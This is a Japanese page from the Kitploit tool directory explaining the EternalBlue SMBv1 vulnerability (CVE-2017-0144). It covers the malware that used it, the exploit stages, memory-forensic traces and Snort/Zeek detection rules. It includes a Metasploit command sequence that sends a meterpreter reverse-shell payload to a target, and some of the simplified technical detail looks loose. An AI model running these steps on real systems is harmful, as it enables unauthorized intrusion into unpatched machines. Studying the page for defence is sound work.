Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
ツール/GitHubGitHub/firetemple/blackash-cve-2017-0144
脆弱性分析エクスプロイトフォレンジックマルウェア分析ペネトレーションテスト脅威インテリジェンス侵入検知学習と教育厳選リソース
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

15910ヶ月前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🌐 CVE-2017-0144 — EternalBlue: Microsoft Windows SMBv1 リモートコード実行の脆弱性

EternalBlue

「ひとつのエクスプロイト。数十のマルウェアファミリー。数十億ドルの損害。」


🔍 一言でまとめると

CVE-2017-0144 は、Microsoft Windows の SMBv1 サーバー実装における深刻なリモートコード実行の脆弱性である。EternalBlue として知られるエクスプロイトはこの穴を悪用し、影響の大きい攻撃(特に WannaCry)に使用された。


🔥 EternalBlue を使用したマルウェア トップ10(詳細)

#マルウェアタイプ初確認攻撃者被害額備考
1WannaCryランサムウェア2017年5月12日Lazarus Group(北朝鮮)40〜80億ドルキルスイッチ: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaワイパー(ランサムウェアを装う)2017年6月27日Sandworm(ロシア)100億ドル以上Mimikatz + EternalBlue + PSEXEC を使用
3Bad Rabbitランサムウェア2017年10月24日Indrik Spider地域的偽の Flash アップデートによるドライブバイ
4Uiwixランサムウェア2017年5月不明低キルスイッチなし、WannaCry よりステルス的
5EternalRocksワーム2017年5月不明中7つの NSA ツール(DoublePulsar 含む)
6Adylkuzzクリプトマイナー2017年5月不明高(サイレント)WannaCry より前 に Monero を採掘
7Retefe銀行型トロイの木馬2017〜2018年不明EU の銀行横展開に EternalBlue を使用
8TrickBotモジュール型マルウェア2017〜2021年Wizard Spider世界的EternalBlue 経由で Ryuk を展開
9Emotetローダー2017〜2021年TA542世界的Cobalt Strike への入口として使用
10Clop / Dridexランサムウェア2019〜2025年TA505医療、政府機関2025年現在も活動中

🧨 EternalBlue エクスプロイトの進化

eternelblue1
ツール公開時期特徴
EternalBlue(オリジナル)2017年4月(Shadow Brokers)SMBv1 RCE
DoublePulsar2017年4月バックドア埋め込み(ring0)
EternalRomance2017年4月SMBv3 版
EternalChampion2017年4月代替 SMB 経路
Metasploit モジュール2017年5月exploit/windows/smb/ms17_010_eternalblue
FuzzBunch2017年4月NSA のエクスプロイトフレームワーク
Impacket + PSEXEC2017〜2025年Python による SMB エクスプロイト
eternelblue2

🔍 CVE-2017-0144(EternalBlue)はどのように悪用されたか

SMBv1 RCE を段階的に解説する技術詳細

「ひとつの不正なパケット。完全な SYSTEM アクセス。ログイン不要。クリック不要。」


🎯 エクスプロイトの流れ(要約)

[Attacker] 
   │
   ├──▶ Sends crafted SMBv1 **Trans2** request
   │       → Triggers **heap overflow** in `srv!SrvOS2FeaListSizeToNt`
   │
   ├──▶ Overwrites function pointers → **kernel shellcode**
   │
   └──▶ Executes **DoublePulsar** backdoor → **Ring-0 payload**
           (e.g., WannaCry `mssecsvc.exe`)

🛠️ 悪用の前提条件

要件詳細
ターゲットSMBv1 が有効な Windows(Win10 以前はデフォルト)
開放ポート445/TCP(または NetBIOS 経由の 139/TCP)
認証不要未認証 — ユーザー名・パスワード不要
アーキテクチャx86 または x64(両対応)
パッチ状態未適用(MS17-010 以前)

🚀 エクスプロイトの段階(7ステップ)

フェーズ1: SMB プロトコルネゴシエーション

SMB_COM_NEGOTIATE → Client sends dialect list
Server responds: SMBv1 supported → Proceed

なぜ? SMBv1 が有効であることを確認するため。


フェーズ2: IPC$ へのツリー接続

eternelblue3
\\TARGET\IPC$ → Anonymous share for SMB pipes

目的: トランザクションリクエストを送信するためのセッションを確立する。


フェーズ3: Trans2 セッションセットアップ(プライマリ)

  • SMB_COM_TRANSACTION2(0x32)を使用
  • サブコマンド: SESSION_SETUP
  • 不正なサイズを持つ FEALIST 構造をセットアップ
FEALIST {
    SizeOfListInBytes = 0xFFFF (or large value)
    ...
}

バグの引き金: SrvOS2FeaListSizeToNt() はこのサイズを境界チェックなしで信頼する。


フェーズ4: セカンダリ Trans2 リクエスト(オーバーフロー)

  • 複数のセカンダリパケットを送信
  • それぞれに**過大なサイズの FEALIST + FEA(ファイル拡張属性)**が含まれる
eternelblue4
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → Overflow buffer
}

ヒープスプレー: メモリレイアウトを制御するために大きなチャンクを割り当てる。


フェーズ5: カーネル内のバッファオーバーフロー

srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // attacker-controlled
    PULONG pNtFeaListSize  // output pointer
)
{
    // No validation of FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

結果:

  • ヒープオーバーフロー → 隣接するカーネルオブジェクトを上書き
  • 標的: SRVNET_BUFFER または POOL_HEADER
  • 関数ポインタ(例: Free ルーチン)を上書き

フェーズ6: カーネルシェルコードの実行

  • 攻撃者は上書きした関数ポインタを介して RIP/EIP を制御
  • 非ページプール内のシェルコードへジャンプ

シェルコードの処理内容:

  1. Ring-0 → Ring-3 への遷移(KeUserModeCallback 経由)
  2. ユーザーモードメモリを割り当て
  3. ペイロードをダウンロード/ステージング(例: mssecsvc.exe)
  4. DoublePulsar バックドアをインストール

フェーズ7: DoublePulsar バックドアの埋め込み

eternelblue6
  • カーネルドライバ(XOR キー 0x00120034)を注入
  • マジック SMB パケットを待ち受ける:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + ペイロード

WannaCry の例:

EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Encrypts files

🧨 エクスプロイトパケット構造(簡略版)

SMB Header
└── Command: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parameter: TotalDataCount = 0x1000
            └── Data: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → Spray heap
                [OVERFLOW] → Overwrite pool
                [SHELLCODE] → x64 ring0

🛠️ 実際のエクスプロイトツール

ツール言語モジュール
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython(NSA)EternalBlue-2.2.0
カスタム C2C/C++WannaCry、NotPetya

Metasploit の例

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 メモリフォレンジックの証跡

証跡場所値
DoublePulsarカーネルメモリXOR キー 0x00120034
シェルコードsrvnet.sys プール0xCC 0x90 0x48 パターン
注入された DLLC:\Windows\mssecsvc.exeSHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

🛡️ 検知ルール

Snort/Suricata

alert tcp any any -> $HOME_NET 445 (
    msg:"ETERNALBLUE Attempt";
    flow:to_server,established;
    content:"|ff|SMB2"; depth:5;
    content:"|00 04 08 00|"; distance:100; within:4;
    classtype:attempted-admin;
    sid:1000001;
)

Zeek(Bro)

event smb1_transaction2_secondary(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Secondary_Args) {
    if (args$data_len > 4096) {
        NOTICE([$note=SMB::Large_Trans2_Data, $conn=c]);
    }
}

🔄 ワームの拡散(WannaCry ループ)

while (true) {
    Scan network for port 445
    if (open) → EternalBlue exploit
    if (success) → Drop mssecsvc.exe + propagate
    Sleep(random(1000, 5000))
}

拡散速度: 世界で毎時約 10,000 台に感染。


🛑 これほど効果的だった理由

要因理由
認証不要SMBv1 は匿名の IPC$ を許可
ワーム化可能LAN スキャンが組み込み
カーネル RCEAV・ユーザープロンプトを回避
レガシー SMBv115年以上デフォルトで有効
未パッチのシステム重要インフラ内の XP、2003、7

ツールをダウンロード